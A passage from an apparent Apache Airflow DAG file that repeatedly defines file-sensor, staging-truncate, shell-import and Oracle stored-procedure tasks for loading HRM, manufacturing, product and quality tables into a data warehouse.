sql= "TRUNCATE TABLE STAGE.UH_PERSONNEL_CATEGORY_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_PERSONNEL_CATEGORY_MAPPING_LD"
ODS_UH_PERSONNEL_CATEGORY_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_PERSONNEL_CATEGORY_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_PERSONNEL_CATEGORY_MAPPING"
UH_PERSONNEL_CATEGORY_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_PERSONNEL_SUBCATE_MAPPING_WH"
ODS_UH_PERSONNEL_SUBCATE_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_PERSONNEL_SUBCATE_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_PERSONNEL_SUBCATE_MAPPING_STG"
UH_PERSONNEL_SUBCATE_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_PERSONNEL_SUBCATE_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_PERSONNEL_SUBCATE_MAPPING_LD"
ODS_UH_PERSONNEL_SUBCATE_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_PERSONNEL_SUBCATE_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_PERSONNEL_SUBCATE_MAPPING"
UH_PERSONNEL_SUBCATE_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_EMPLOYMENTTYPE_MAPPING_WH"
ODS_UH_EMPLOYMENTTYPE_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_EMPLOYMENTTYPE_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_EMPLOYMENTTYPE_MAPPING_STG"
UH_EMPLOYMENTTYPE_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_EMPLOYMENTTYPE_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_EMPLOYMENTTYPE_MAPPING_LD"
ODS_UH_EMPLOYMENTTYPE_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_EMPLOYMENTTYPE_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_EMPLOYMENTTYPE_MAPPING"
UH_EMPLOYMENTTYPE_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_STAFFSTATUS_WH"
ODS_UH_STAFFSTATUS_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_STAFFSTATUS_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_STAFFSTATUS_STG"
UH_STAFFSTATUS_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_STAFFSTATUS"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_STAFFSTATUS_LD"
ODS_UH_STAFFSTATUS_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_STAFFSTATUS"
)
# JOB_TYPE=SQL
my_taskid = "UH_STAFFSTATUS"
UH_STAFFSTATUS = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_STAFFSTATUS_TOBE_ONBOARD_WH"
ODS_UH_STAFFSTATUS_TOBE_ONBOARD_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_STAFFSTATUS_TOBE_ONBOARD_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_STAFFSTATUS_TOBE_ONBOARD_STG"
UH_STAFFSTATUS_TOBE_ONBOARD_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_STAFFSTATUS_TOBE_ONBOARD"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_STAFFSTATUS_TOBE_ONBOARD_LD"
ODS_UH_STAFFSTATUS_TOBE_ONBOARD_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_STAFFSTATUS_TOBE_ONBOARD"
)
# JOB_TYPE=SQL
my_taskid = "UH_STAFFSTATUS_TOBE_ONBOARD"
UH_STAFFSTATUS_TOBE_ONBOARD = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_GRADE_MAPPING_WH"
ODS_UH_GRADE_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_GRADE_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_GRADE_MAPPING_STG"
UH_GRADE_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_GRADE_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_GRADE_MAPPING_LD"
ODS_UH_GRADE_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_GRADE_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_GRADE_MAPPING"
UH_GRADE_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UH_EDUCATION_MAPPING_WH"
ODS_UH_EDUCATION_MAPPING_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_HRM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/HRM/UH_EDUCATION_MAPPING_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UH_EDUCATION_MAPPING_STG"
UH_EDUCATION_MAPPING_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
sql= "TRUNCATE TABLE STAGE.UH_EDUCATION_MAPPING"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UH_EDUCATION_MAPPING_LD"
ODS_UH_EDUCATION_MAPPING_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_HRM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD HRM UH_EDUCATION_MAPPING"
)
# JOB_TYPE=SQL
my_taskid = "UH_EDUCATION_MAPPING"
UH_EDUCATION_MAPPING = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_HRM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_RiskShipmentUpload_WH"
ODS_UM_RiskShipmentUpload_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_RiskShipmentUpload_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_RiskShipmentUpload_STG"
UM_RiskShipmentUpload_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_RiskShipmentUpload"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_RiskShipmentUpload_LD"
ODS_UM_RiskShipmentUpload_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_RiskShipmentUpload"
)
# JOB_TYPE=SQL
my_taskid = "UM_RiskShipmentUpload"
UM_RiskShipmentUpload = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_SMT_TIME_WH"
ODS_UM_SMT_TIME_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_SMT_TIME_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_SMT_TIME_STG"
UM_SMT_TIME_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_SMT_TIME"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_SMT_TIME_LD"
ODS_UM_SMT_TIME_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_SMT_TIME"
)
# JOB_TYPE=SQL
my_taskid = "UM_SMT_TIME"
UM_SMT_TIME = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_SMT_WH"
ODS_UM_SMT_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_SMT_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_SMT_STG"
UM_SMT_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_SMT"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_SMT_LD"
ODS_UM_SMT_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_SMT"
)
# JOB_TYPE=SQL
my_taskid = "UM_SMT"
UM_SMT = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_ForecastUploadModel_WH"
ODS_UM_ForecastUploadModel_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_ForecastUploadModel_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_ForecastUploadModel_STG"
UM_ForecastUploadModel_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_ForecastUploadModel"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_ForecastUploadModel_LD"
ODS_UM_ForecastUploadModel_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_ForecastUploadModel"
)
# JOB_TYPE=SQL
my_taskid = "UM_ForecastUploadModel"
UM_ForecastUploadModel = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_Shift_WH"
ODS_UM_Shift_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_Shift_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_Shift_STG"
UM_Shift_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_Shift"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_Shift_LD"
ODS_UM_Shift_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_Shift"
)
# JOB_TYPE=SQL
my_taskid = "UM_Shift"
UM_Shift = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_Resource_Mapping_Process_WH"
ODS_UM_Resource_Mapping_Process_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_Resource_Mapping_Process_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_Resource_Mapping_Process_STG"
UM_Resource_Mapping_Process_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_Resource_Mapping_Process"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_Resource_Mapping_Process_LD"
ODS_UM_Resource_Mapping_Process_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_Resource_Mapping_Process"
)
# JOB_TYPE=SQL
my_taskid = "UM_Resource_Mapping_Process"
UM_Resource_Mapping_Process = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UM_Work_in_Process_Category_WH"
ODS_UM_Work_in_Process_Category_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_MFG,
filepath= "{{ var.value.DIR_SOURCE }}UPD/MFG/UM_Work_in_Process_Category_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UM_Work_in_Process_Category_STG"
UM_Work_in_Process_Category_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
sql= "TRUNCATE TABLE STAGE.UM_Work_in_Process_Category"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UM_Work_in_Process_Category_LD"
ODS_UM_Work_in_Process_Category_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_MFG,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD MFG UM_Work_in_Process_Category"
)
# JOB_TYPE=SQL
my_taskid = "UM_Work_in_Process_Category"
UM_Work_in_Process_Category = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_MFG,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UP_consign_vendor_prod_map_WH"
ODS_UP_consign_vendor_prod_map_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_PRD,
filepath= "{{ var.value.DIR_SOURCE }}UPD/PRD/UP_consign_vendor_prod_map_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UP_consign_vendor_prod_map_STG"
UP_consign_vendor_prod_map_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD,
sql= "TRUNCATE TABLE STAGE.UP_consign_vendor_prod_map"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UP_consign_vendor_prod_map_LD"
ODS_UP_consign_vendor_prod_map_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_PRD,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD PRD UP_consign_vendor_prod_map"
)
# JOB_TYPE=SQL
my_taskid = "UP_consign_vendor_prod_map"
UP_consign_vendor_prod_map = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UP_Expense_Budget_prod_map_WH"
ODS_UP_Expense_Budget_prod_map_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_PRD,
filepath= "{{ var.value.DIR_SOURCE }}UPD/PRD/UP_Expense_Budget_prod_map_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UP_Expense_Budget_prod_map_STG"
UP_Expense_Budget_prod_map_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD,
sql= "TRUNCATE TABLE STAGE.UP_Expense_Budget_prod_map"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UP_Expense_Budget_prod_map_LD"
ODS_UP_Expense_Budget_prod_map_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_PRD,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD PRD UP_Expense_Budget_prod_map"
)
# JOB_TYPE=SQL
my_taskid = "UP_Expense_Budget_prod_map"
UP_Expense_Budget_prod_map = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_PRD,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_MtlScrapCost_WH"
ODS_UQ_MtlScrapCost_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_MtlScrapCost_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_MtlScrapCost_STG"
UQ_MtlScrapCost_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_MtlScrapCost"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_MtlScrapCost_LD"
ODS_UQ_MtlScrapCost_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_MtlScrapCost"
)
# JOB_TYPE=SQL
my_taskid = "UQ_MtlScrapCost"
UQ_MtlScrapCost = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_CSDCustomerPaidService_WH"
ODS_UQ_CSDCustomerPaidService_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_CSDCustomerPaidService_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_CSDCustomerPaidService_STG"
UQ_CSDCustomerPaidService_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_CSDCustomerPaidService"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_CSDCustomerPaidService_LD"
ODS_UQ_CSDCustomerPaidService_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_CSDCustomerPaidService"
)
# JOB_TYPE=SQL
my_taskid = "UQ_CSDCustomerPaidService"
UQ_CSDCustomerPaidService = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_CSDPlannedShippingQty_WH"
ODS_UQ_CSDPlannedShippingQty_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_CSDPlannedShippingQty_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_CSDPlannedShippingQty_STG"
UQ_CSDPlannedShippingQty_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_CSDPlannedShippingQty"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_CSDPlannedShippingQty_LD"
ODS_UQ_CSDPlannedShippingQty_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_CSDPlannedShippingQty"
)
# JOB_TYPE=SQL
my_taskid = "UQ_CSDPlannedShippingQty"
UQ_CSDPlannedShippingQty = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_InventoryOwner_WH"
ODS_UQ_InventoryOwner_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_InventoryOwner_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_InventoryOwner_STG"
UQ_InventoryOwner_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_InventoryOwner"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_InventoryOwner_LD"
ODS_UQ_InventoryOwner_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_InventoryOwner"
)
# JOB_TYPE=SQL
my_taskid = "UQ_InventoryOwner"
UQ_InventoryOwner = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_OnSiteReworkQty_WH"
ODS_UQ_OnSiteReworkQty_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_OnSiteReworkQty_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_OnSiteReworkQty_STG"
UQ_OnSiteReworkQty_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
sql= "TRUNCATE TABLE STAGE.UQ_OnSiteReworkQty"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UQ_OnSiteReworkQty_LD"
ODS_UQ_OnSiteReworkQty_LD = BashOperator(
task_id=my_taskid,
dag=D_ODS_QAM,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD QAM UQ_OnSiteReworkQty"
)
# JOB_TYPE=SQL
my_taskid = "UQ_OnSiteReworkQty"
UQ_OnSiteReworkQty = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=D_ODS_QAM,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UQ_QualityReturnQty_WH"
ODS_UQ_QualityReturnQty_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=D_ODS_QAM,
filepath= "{{ var.value.DIR_SOURCE }}UPD/QAM/UQ_QualityReturnQty_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UQ_QualityReturnQty_STG"
